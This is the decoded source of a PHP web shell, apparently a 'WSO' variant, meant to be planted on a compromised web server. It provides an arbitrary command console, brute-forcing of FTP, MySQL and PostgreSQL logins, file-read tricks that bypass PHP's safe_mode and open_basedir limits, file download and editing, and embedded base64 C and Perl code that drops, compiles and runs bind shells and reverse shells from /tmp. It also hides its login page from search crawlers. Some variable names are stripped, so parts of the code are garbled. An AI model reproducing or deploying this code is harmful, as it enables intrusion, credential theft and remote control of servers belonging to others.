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/* Decoded by */ <? goto r3B2Y; Oda8Q: function actionConsole() { if (!e..

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/* Decoded by */ 
 goto r3B2Y; Oda8Q: function actionConsole() { if (!empty($_POST["p1"]) && !empty($_POST["p2"])) { prototype(md5($_SERVER["HTTP_HOST"]) . "stderr_to_out", true); $_POST["p1"] .= " 2>&1"; } elseif (!empty($_POST["p1"])) { prototype(md5($_SERVER["HTTP_HOST"]) . "stderr_to_out", 0); } if (isset($_POST["ajax"])) { prototype(md5($_SERVER["HTTP_HOST"]) . "ajax", true); ob_start(); echo "''; 
"; $temp = @iconv($_POST["charset"], "UTF-8", addcslashes(" 
$ " . $_POST["p1"] . " 
" . ex($_POST["p1"]), " 
\xd\x9\'\0")); if (preg_match("!.*cd\s+([^;]+)$!", $_POST["p1"], $match)) { if (@chdir($match[1])) { $GLOBALS["cwd"] = @getcwd(); echo "c_='" . $GLOBALS["cwd"] . "';"; } } echo "'" . $temp . "';"; echo " =;"; $temp = ob_get_clean(); echo strlen($temp), " 
", $temp; die; } if (empty($_POST["ajax"]) && !empty($_POST["p1"])) { prototype(md5($_SERVER["HTTP_HOST"]) . "ajax", 0); } hardHeader(); echo "<script> 
if(window.Event) window.captureEvents(Event.KEYDOWN);\xavar cmds = new Array(''); 
var cur = 0; 
function kp(e) { 
\x9var n = (window.Event) ? e.which : e.keyCode; 
\x9if(n == 38) { 
	\x9cur--;\xa	\x9if(cur>=0) 
\x9\x9 = cmds[cur];\xa	\x9else\xa\x9\x9\x9cur++;\xa	} else if(n == 40) {\xa	\x9cur++;\xa\x9	if(cur < cmds.length)\xa\x9 = cmds[cur]; 
function add(cmd) {\xa\x9cmds.pop();\xa	cmds.push(cmd); 
\x9cmds.push('');\xa\x9cur = cmds.length-1;\xa} 
</script>"; echo "<h1>Console</h1><div class=content><form name=cf onsubmit="if('clear'){'';'';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:'');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:'');} return false;"><label><select name=alias>"; foreach ($GLOBALS["aliases"] as $n => $v) { if ($v == '') { echo "<optgroup label="-" . htmlspecialchars($n) . "-"></optgroup>"; continue; } echo "<option value="" . htmlspecialchars($v) . "">" . $n . "</option>"; } echo "</select></label><input type=button onclick="add(;if({a(null,null,,'');}else{g(null,null,,'');}" value="submit"> <nobr><input type=checkbox name=ajax value=1 " . (@$_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] ? "checked" : '') . "> send using AJAX <input type=checkbox name=show_errors value=1 " . (!empty($_POST["p2"]) || $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "stderr_to_out"] ? "checked" : '') . "> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin-top:5px;" readonly>"; if (!empty($_POST["p1"])) { echo htmlspecialchars("$ " . $_POST["p1"] . "\xa" . ex($_POST["p1"])); } echo "</textarea><table style="border:1px solid #060a10;background-color:#060a10;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td style="padding-left:4px; width:13px;">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>"; echo "</form></div><script>;</script>"; hardFooter(); } goto xWgYK; asFIH: function actionSelfRemove() { if ($_POST["p1"] == "yes") { if (@unlink(preg_replace("!\(\d+\)\s.*!", '', __FILE__))) { die("Shell has been removed"); } else { echo "unlink error!"; } } if ($_POST["p1"] != "yes") { hardHeader(); } echo "<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,'yes')">Yes</a></div>"; hardFooter(); } goto eHsyk; gS860: function perms($p) { if (($p & 49152) == 49152) { $i = "s"; } elseif (($p & 40960) == 40960) { $i = "l"; } elseif (($p & 32768) == 32768) { $i = "-"; } elseif (($p & 24576) == 24576) { $i = "b"; } elseif (($p & 16384) == 16384) { $i = "d"; } elseif (($p & 8192) == 8192) { $i = "c"; } elseif (($p & 4096) == 4096) { $i = "p"; } else { $i = "u"; } $i .= $p & 256 ? "r" : "-"; $i .= $p & 128 ? "w" : "-"; $i .= $p & 64 ? $p & 2048 ? "s" : "x" : ($p & 2048 ? "S" : "-"); $i .= $p & 32 ? "r" : "-"; $i .= $p & 16 ? "w" : "-"; $i .= $p & 8 ? $p & 1024 ? "s" : "x" : ($p & 1024 ? "S" : "-"); $i .= $p & 4 ? "r" : "-"; $i .= $p & 2 ? "w" : "-"; $i .= $p & 1 ? $p & 512 ? "t" : "x" : ($p & 512 ? "T" : "-"); return $i; } goto y4kgJ; f9sl9: function actionBruteforce() { hardHeader(); if (isset($_POST["proto"])) { echo "<h1>Results</h1><div class=content><span>Type:</span> " . htmlspecialchars($_POST["proto"]) . " <span>Server:</span> " . htmlspecialchars($_POST["server"]) . "<br>"; if ($_POST["proto"] == "ftp") { function bruteForce($ip, $port, $login, $pass) { $fp = @ftp_connect($ip, $port ? $port : 21); if (!$fp) { return false; } $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif ($_POST["proto"] == "mysql") { function bruteForce($ip, $port, $login, $pass) { $res = @mysql_connect($ip . ":" . ($port ? $port : 3306), $login, $pass); @mysql_close($res); return $res; } } elseif ($_POST["proto"] == "pgsql") { function bruteForce($ip, $port, $login, $pass) { $str = "host='" . $ip . "' port='" . $port . "' user='" . $login . "' password='" . $pass . "' dbname=postgres"; $res = @pg_connect($str); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode(":", $_POST["server"]); if ($_POST["type"] == 1) { $temp = @file("/etc/passwd"); if (is_array($temp)) { foreach ($temp as $line) { $line = explode(":", $line); ++$attempts; if (bruteForce(@$server[0], @$server[1], $line[0], $line[0])) { $success++; echo "<b>" . htmlspecialchars($line[0]) . "</b>:" . htmlspecialchars($line[0]) . "<br>"; } if (@$_POST["reverse"]) { $tmp = ''; for ($i = strlen($line[0]) - 1; $i >= 0; --$i) { $tmp .= $line[0][$i]; } ++$attempts; if (bruteForce(@$server[0], @$server[1], $line[0], $tmp)) { $success++; echo "<b>" . htmlspecialchars($line[0]) . "</b>:" . htmlspecialchars($tmp); } } } } } elseif ($_POST["type"] == 2) { $temp = @file($_POST["dict"]); if (is_array($temp)) { foreach ($temp as $line) { $line = trim($line); ++$attempts; if (bruteForce($server[0], @$server[1], $_POST["login"], $line)) { $success++; echo "<b>" . htmlspecialchars($_POST["login"]) . "</b>:" . htmlspecialchars($line) . "<br>"; } } } } echo "<span>Attempts:</span> {$attempts} <span>Success:</span> {$success}</div><br>"; } echo "<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>" . "<td><label><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></label></td></tr><tr><td>" . "<input type=hidden name=c value="" . htmlspecialchars($GLOBALS["cwd"]) . "">" . "<input type=hidden name=a value="" . htmlspecialchars($_POST["a"]) . "">" . "<input type=hidden name=charset value="" . htmlspecialchars($_POST["charset"]) . "">" . "<input type=hidden name=ne  value="">" . "<span>Server:port</span></td>" . "<td><input type=text name=server value=""></td></tr>" . "<tr><td><span>Brute type</span></td>" . "<td><input type=radio name=type value="1" checked> /etc/passwd</td></tr>" . "<tr><td></td><td style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</td></tr>" . "<tr><td></td><td><input type=radio name=type value="2"> Dictionary</td></tr>" . "<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>" . "<td><input type=text name=login value="root"></td></tr>" . "<tr><td><span>Dictionary</span></td>" . "<td><input type=text name=dict value="" . htmlspecialchars($GLOBALS["cwd"]) . "passwd.dic"></td></tr></table>" . "</td></tr><tr><td></td><td><input type=submit value="submit"></td></tr></form></table>"; echo "</div>"; hardFooter(); } goto rGxXC; Xbodc: if (!function_exists("get_magic_quotes_gpc") || get_magic_quotes_gpc()) { function stripslashes_array($array) { return is_array($array) ? array_map("stripslashes_array", $array) : stripslashes($array); } $_POST = stripslashes_array($_POST); $_COOKIE = stripslashes_array($_COOKIE); } goto p17RR; gaKKg: function actionSafeMode() { $temp = ''; ob_start(); switch ($_POST["p1"]) { case 1: $temp = @tempnam($test, "cx"); if (@copy("compress.zlib://" . $_POST["p2"], $temp)) { echo @file_get_contents($temp); unlink($temp); } else { echo "Sorry... Can't open file"; } break; case 2: $files = glob($_POST["p2"] . "*"); if (is_array($files)) { foreach ($files as $filename) { echo $filename . "\xa"; } } break; case 3: $ch = curl_init("file://" . $_POST["p2"] . "\0" . SELF_PATH); curl_exec($ch); break; case 4: ini_restore("safe_mode"); ini_restore("open_basedir"); include $_POST["p2"]; break; case 5: for (; $_POST["p2"] <= $_POST["p3"]; $_POST["p2"]++) { $uid = @posix_getpwuid($_POST["p2"]); if ($uid) { echo join(":", $uid) . "\xa"; } } break; case 6: if (!function_exists("imap_open")) { break; } $stream = imap_open($_POST["p2"], '', ''); if ($stream == FALSE) { break; } echo imap_body($stream, 1); imap_close($stream); break; } $temp = ob_get_clean(); hardHeader(); echo "<h1>Safe mode bypass</h1><div class=content>"; echo "<span>Copy (read file)</span><form onsubmit='g(null,null,"1",this.param.value);return false;'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Glob (list dir)</span><form onsubmit='g(null,null,"2",this.param.value);return false;'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Curl (read file)</span><form onsubmit='g(null,null,"3",this.param.value);return false;'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Ini_restore (read file)</span><form onsubmit='g(null,null,"4",this.param.value);return false;'><input class="toolsInp" type=text name=param><input type=submit value="submit"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value="submit"></form><br><br><span>Imap_open (read file)</span><form onsubmit='g(null,null,"6",this.param.value);return false;'><input type=text name=param><input type=submit value="submit"></form>"; if ($temp) { echo "<pre class="ml1" style="margin-top:5px" id="Output">" . $temp . "</pre>"; } echo "</div>"; hardFooter(); } goto urnx6; ZjyZB: if (!empty($_POST["a"]) && function_exists("action" . $_POST["a"])) { call_user_func("action" . $_POST["a"]); } goto G6Uv3; R8xcz: function decrypt($str, $pwd) { $pwd = base64_encode($pwd); $str = base64_decode($str); $enc_chr = ''; $enc_str = ''; $i = 0; while ($i < strlen($str)) { for ($j = 0; $j < strlen($pwd); $j++) { $enc_chr = chr(ord($str[$i]) ^ ord($pwd[$j])); $enc_str .= $enc_chr; $i++; if ($i >= strlen($str)) { break; } } } return base64_decode($enc_str); } goto w0nra; wlqmv: $cwd = @getcwd(); goto vmP50; nbi9R: function viewSize($s) { if ($s >= 1073741824) { return sprintf("%1.2f", $s / 1073741824) . " GB"; } elseif ($s >= 1048576) { return sprintf("%1.2f", $s / 1048576) . " MB"; } elseif ($s >= 1024) { return sprintf("%1.2f", $s / 1024) . " KB"; } else { return $s . " B"; } } goto gS860; KGlJ0: if (strtolower(substr(PHP_OS, 0, 3)) == "win") { $os = "win"; } else { $os = "nix"; } goto JCS_A; qDiW5: $ = "FilesMan"; goto WeQHr; xxz2n: if (!$safe_mode) { error_reporting(0); } goto E3hGz; w0nra: @ini_set("error_log", NULL); goto hwJg4; BKw4L: if (version_compare(PHP_VERSION, "5.3.0", "<")) { set_magic_quotes_runtime(0); } goto IjCwH; E3hGz: $disable_functions = @ini_get("disable_functions"); goto WJp40; w9TDR: function prototype($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } goto uwRUw; B0PbS: if (!isset($_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"])) { $_COOKIE[md5($_SERVER["HTTP_HOST"]) . "ajax"] = (bool) $; } goto PtFVC; UOKiC: if (empty($_POST["charset"])) { $_POST["charset"] = $; } goto FVur6; et3or: function actionNetwork() { hardHeader(); $back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9"; $back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; $bind_port_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzLGMsaTsNCiAgICBjaGFyIHBbMzBdOw0KICAgIHN0cnVjdCBzb2NrYWRkcl9pbiByOw0KICAgIGRhZW1vbigxLDApOw0KICAgIHMgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighcykgcmV0dXJuIC0xOw0KICAgIHIuc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgci5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHIuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7DQogICAgYmluZChzLCAoc3RydWN0IHNvY2thZGRyICopJnIsIDB4MTApOw0KICAgIGxpc3RlbihzLCA1KTsNCiAgICB3aGlsZSgxKSB7DQogICAgICAgIGM9YWNjZXB0KHMsMCwwKTsNCiAgICAgICAgZHVwMihjLDApOw0KICAgICAgICBkdXAyKGMsMSk7DQogICAgICAgIGR1cDIoYywyKTsNCiAgICAgICAgd3JpdGUoYywiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChjLHAsc2l6ZW9mKHApKTsNCiAgICAgICAgZm9yKGk9MDtpPHN0cmxlbihwKTtpKyspDQogICAgICAgICAgICBpZiggKHBbaV0gPT0gJ1xuJykgfHwgKHBbaV0gPT0gJ1xyJykgKQ0KICAgICAgICAgICAgICAgIHBbaV0gPSAnXDAnOw0KICAgICAgICBpZiAoc3RyY21wKGFyZ3ZbMl0scCkgPT0gMCkNCiAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICBjbG9zZShjKTsNCiAgICB9DQp9"; $bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; echo "<h1>Network tools</h1><div class=content> 
	<form name='nfp' onSubmit='g(null,null,this.using.value,this.port.value,this.pass.value);return false;'> 
	<span>Bind port to /bin/sh</span><br/>\xa	Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass'> Using: <label><select name='using'><option value='bpc'>C</option><option value='bpp'>Perl</option></select></label> <input type=submit value='submit'> 
\x9<form name='nfp' onSubmit='g(null,null,this.using.value,this.server.value,this.port.value);return false;'>\xa\x9<span>Back-connect to</span><br/>\xa\x9Server: <input type='text' name='server' value=" . $_SERVER["REMOTE_ADDR"] . "> Port: <input type='text' name='port' value='31337'> Using: <label><select name='using'><option value='bcc'>C</option><option value='bcp'>Perl</option></select></label> <input type=submit value='submit'> 
	</form><br>"; if (isset($_POST["p1"])) { function cf($f, $t) { $w = @fopen($f, "w") or @function_exists("file_put_contents"); if ($w) { @fwrite($w, @base64_decode($t)) or @fputs($w, @base64_decode($t)) or @file_put_contents($f, @base64_decode($t)); @fclose($w); } } if ($_POST["p1"] == "bpc") { cf("/tmp/bp.c", $bind_port_c); $ = ex("gcc -o /tmp/bp /tmp/bp.c"); @unlink("/tmp/bp.c"); $ .= ex("/tmp/bp " . $_POST["p2"] . " " . $_POST["p3"] . " &"); echo "<pre class=ml1>{$}" . ex("ps aux | grep bp") . "</pre>"; } if ($_POST["p1"] == "bpp") { cf("/tmp/", $bind_port_p); $ = ex(which("perl") . " /tmp/ " . $_POST["p2"] . " &"); echo "<pre class=ml1>{$}" . ex("ps aux | grep") . "</pre>"; } if ($_POST["p1"] == "bcc") { cf("/tmp/bc.c", $back_connect_c); $ = ex("gcc -o /tmp/bc /tmp/bc.c"); @unlink("/tmp/bc.c"); $ .= ex("/tmp/bc " . $_POST["p2"] . " " . $_POST["p3"] . " &"); echo "<pre class=ml1>{$}" . ex("ps aux | grep bc") . "</pre>"; } if ($_POST["p1"] == "bcp") { cf("/tmp/", $back_connect_p); $ = ex(which("perl") . " /tmp/ " . $_POST["p2"] . " " . $_POST["p3"] . " &"); echo "<pre class=ml1>{$}" . ex("ps aux | grep") . "</pre>"; } } echo "</div>"; hardFooter(); } goto M5O7z; YnRbs: function hardScandir($dir) { if (function_exists("scandir")) { return scandir($dir); } else { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) { $files[] = $filename; } return $files; } } goto VnLxZ; VMrgb: function ex($in) { $ = ''; if (function_exists("exec")) { @exec($in, $); $ = @join("\xa", $); } elseif (function_exists("passthru")) { ob_start(); @passthru($in); $ = ob_get_clean(); } elseif (function_exists("system")) { ob_start(); @system($in); $ = ob_get_clean(); } elseif (function_exists("shell_exec")) { $ = shell_exec($in); } elseif (is_resource($f = @popen($in, "r"))) { $ = ''; while (!@feof($f)) { $ .= fread($f, 1024); } pclose($f); } else { return "\xe2\x86\263 Unable to execute command 
"; } return $ == '' ? "\xe2\x86\263 Query did not return anything\xa" : $; } goto nbi9R; VnLxZ: function which($p) { $path = ex("which " . $p); if (!empty($path)) { return $path; } return false; } goto Th0Rk; PtFVC: function hardLogin() { if (!empty($_SERVER["HTTP_USER_AGENT"])) { $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"); if (preg_match("/" . implode("|", $userAgents) . "/i", $_SERVER["HTTP_USER_AGENT"])) { header("HTTP/1.0 404 Not Found"); die; } } die("</br></br><pre align=center><form method=post style='font-family:Nunito, sans-serif;color:#1a1a1a; text-shadow: 2px 0 0 #0d52bf, -2px 0 0 #0d52bf, 0 2px 0 #0d52bf, 0 -2px 0 #0d52bf, 1px 1px #0d52bf, -1px -1px 0 #0d52bf, 1px -1px 0 #0d52bf, -1px 1px 0 #0d52bf; text-align: center;'><h3>Hello <br>Welcome to wso webshell redesignated by mIcHy AmRaNe</h3><br><input placeholder='password' type=password name=pass style='border-radius: 4px 0px 0px 4px; background-color:whitesmoke;border:1px solid #FFF;outline:none;' required><input type=submit name='watching' value='>>' style='height: 20px; border: none; border-radius: 0px 4px 4px 0px;background-color:#0d52bf;color:#fff;cursor:pointer;'></form></pre> 
<div class='view'><div class='plane main'><div class='circle'></div><div class='circle'></div><div class='circle'></div><div class='circle'></div><div class='circle'></div><div class='circle'></div></div></div>\xa<style>body,html{background:#1a1a1a;overflow:hidden;width:100%;height:100%;position:absolute;z-index: -2;}.view{position:absolute;top:0;left:0;right:0;bottom:0;-webkit-perspective:400;perspective:400;z-index: -2;}.plane{width:120px;height:120px;-webkit-transform-style:preserve-3d;transform-style:preserve-3d;position:absolute;z-index: -2;}.plane.main{position:absolute;top:0;left:0;right:0;bottom:0;margin:auto;-webkit-transform:rotateX(60deg) rotateZ(-30deg);transform:rotateX(60deg) rotateZ(-30deg);-webkit-animation:rotate 20s infinite linear;animation:rotate 20s infinite linear;z-index: -2;}.plane.main .circle{width:120px;height:120px;position:absolute;-webkit-transform-style:preserve-3d;transform-style:preserve-3d;border-radius:100%;box-sizing:border-box;box-shadow:0 0 60px #a10705,inset 0 0 60px #7a0000;z-index: -2;}.plane.main .circle::after,.plane.main .circle::before{content:'';display:block;position:absolute;top:0;left:0;right:0;bottom:0;margin:auto;width:5%;height:5%;border-radius:100%;background:#5d0819;box-sizing:border-box;box-shadow:0 0 60px 2px #7a0000;z-index: -2;}.plane.main .circle::before{-webkit-transform:translateZ(-90px);transform:translateZ(-90px)}.plane.main .circle::after{-webkit-transform:translateZ(90px);transform:translateZ(90px)}.plane.main .circle:nth-child(1){-webkit-transform:rotateZ(72deg) rotateX(63.435deg);transform:rotateZ(72deg) rotateX(63.435deg)}.plane.main .circle:nth-child(2){-webkit-transform:rotateZ(144deg) rotateX(63.435deg);transform:rotateZ(144deg) rotateX(63.435deg)}.plane.main .circle:nth-child(3){-webkit-transform:rotateZ(216deg) rotateX(63.435deg);transform:rotateZ(216deg) rotateX(63.435deg)}.plane.main .circle:nth-child(4){-webkit-transform:rotateZ(288deg) rotateX(63.435deg);transform:rotateZ(288deg) rotateX(63.435deg)}.plane.main .circle:nth-child(5){-webkit-transform:rotateZ(360deg) rotateX(63.435deg);transform:rotateZ(360deg) rotateX(63.435deg)}@-webkit-keyframes rotate{0%{-webkit-transform:rotateX(0) rotateY(0) rotateZ(0);transform:rotateX(0) rotateY(0) rotateZ(0)}100%{-webkit-transform:rotateX(360deg) rotateY(360deg) rotateZ(360deg);transform:rotateX(360deg) rotateY(360deg) rotateZ(360deg)}}@keyframes rotate{0%{-webkit-transform:rotateX(0) rotateY(0) rotateZ(0);transform:rotateX(0) rotateY(0) rotateZ(0)}100%{-webkit-transform:rotateX(360deg) rotateY(360deg) rotateZ(360deg);transform:rotateX(360deg) rotateY(360deg) rotateZ(360deg)}}; h2{color:whitesmoke; font-weight:bold; text-decoration:underline;}</style>"); } goto KGlJ0; h3psb: function actionFilesTools() { if (isset($_POST["p1"])) { $_POST["p1"] = urldecode($_POST["p1"]); } if (@$_POST["p2"] == "download") { if (@is_file($_POST["p1"]) && @is_readable($_POST["p1"])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=" . basename($_POST["p1"])); if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST["p1"]); header("Content-Type: " . $type); } else { header("Content-Type: application/octet-stream"); } $fp = @fopen($_POST["p1"], "r"); if ($fp) { while (!@feof($fp)) { echo @fread($fp, 1024); } fclose($fp); } } die; } if (@$_POST["p2"] == "mkfile") { if (!file_exists($_POST["p1"])) { $fp = @fopen($_POST["p1"], "w"); if ($fp) { $_POST["p2"] = "edit"; fclose($fp); } } } hardHeader(); echo "<h1>File tools</h1><div class=content>"; if (!file_exists(@$_POST["p1"])) { echo "File not exists"; hardFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST["p1"])); if (!$uid) { $uid["name"] = @fileowner($_POST["p1"]); $gid["name"] = @filegroup($_POST["p1"]); } else { $gid = @posix_getgrgid(@filegroup($_POST["p1"])); } echo "<span>Name:</span> " . htmlspecialchars(@basename($_POST["p1"])) . " <span>Size:</span> " . (is_file($_POST["p1"]) ? viewSize(filesize($_POST["p1"])) : "-") . " <span>Permission:</span> " . viewPermsColor($_POST["p1"]) . " <span>Owner/Group:</span> " . $uid["name"] . "/" . $gid["name"] . "<br>"; echo "<span>Create time:</span> " . date("Y-m-d H:i:s", filectime($_POST["p1"])) . " <span>Access time:</span> " . date("Y-m-d H:i:s", fileatime($_POST["p1"])) . " <span>Modify time:</span> " . date("Y-m-d H:i:s", filemtime($_POST["p1"])) . "<br><br>"; if (empty($_POST["p2"])) { $_POST["p2"] = "view"; } if (is_file($_POST["p1"])) { $m = array("View", "Highlight", "Download", "Hexdump", "Edit", "Chmod", "Rename", "Touch", "Frame"); } else { $m = array("Chmod", "Rename", "Touch"); } foreach ($m as $v) { echo "<a href=# onclick="g(null,null,'" . urlencode($_POST["p1"]) . "','" . strtolower($v) . "')">" . (strtolower($v) == @$_POST["p2"] ? "<b>[ " . $v . " ]</b>" : $v) . "</a> "; } echo "<br><br>"; switch ($_POST["p2"]) { case "view": echo "<pre class=ml1>"; $fp = @fopen($_POST["p1"], "r"); if ($fp) { while (!@feof($fp)) { echo htmlspecialchars(@fread($fp, 1024)); } @fclose($fp); } echo "</pre>"; break; case "highlight": if (@is_readable($_POST["p1"])) { echo "<div class=ml1 style="background-color: #e1e1e1;color:black;">"; $oRb = @highlight_file($_POST["p1"], true); echo str_replace(array("<span ", "</span>"), array("<font ", "</font>"), $oRb) . "</div>"; } break; case "chmod": if (!empty($_POST["p3"])) { $perms = 0; for ($i = strlen($_POST["p3"]) - 1; $i >= 0; --$i) { $perms += (int) $_POST["p3"][$i] * pow(8, strlen($_POST["p3"]) - $i - 1); } if (!@chmod($_POST["p1"], $perms)) { echo "Can't set permissions!<br><script>"";</script>"; } } clearstatcache(); echo "<script>p3_="";</script><form onsubmit="g(null,null,'" . urlencode($_POST["p1"]) . "',null,this.chmod.value);return false;"><input type=text name=chmod value="" . substr(sprintf("%o", fileperms($_POST["p1"])), -4) . ""><input type=submit value="submit"></form>"; break; case "edit": if (!is_writable($_POST["p1"])) { echo "File isn't writeable"; break; } if (!empty($_POST["p3"])) { $time = @filemtime($_POST["p1"]); $_POST["p3"] = substr($_POST["p3"], 1); $fp = @fopen($_POST["p1"], "w"); if ($fp) { @fwrite($fp, $_POST["p3"]); @fclose($fp); echo "Saved!<br><script>p3_="";</script>"; @touch($_POST["p1"], $time, $time); } } echo "<form onsubmit="g(null,null,'" . urlencode($_POST["p1"]) . "',null,'1'+this.text.value);return false;"><textarea name=text class=bigarea>"; $fp = @fopen($_POST["p1"], "r"); if ($fp) { while (!@feof($fp)) { echo htmlspecialchars(@fread($fp, 1024)); } @fclose($fp); } echo "</textarea><input type=submit value="submit"></form>"; break; case "hexdump": $c = @file_get_contents($_POST["p1"]); $n = 0; $h = array("00000000<br>", '', ''); $len = strlen($c); for ($i = 0; $i < $len; ++$i) { $h[1] .= sprintf("%02X", ord($c[$i])) . " "; switch (ord($c[$i])) { case 0: $h[2] .= " "; break; case 9: $h[2] .= " "; break; case 10: $h[2] .= " "; break; case 13: $h[2] .= " "; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i + 1 < $len) { $h[0] .= sprintf("%08X", $i + 1) . "<br>"; } $h[1] .= "<br>"; $h[2] .= " 
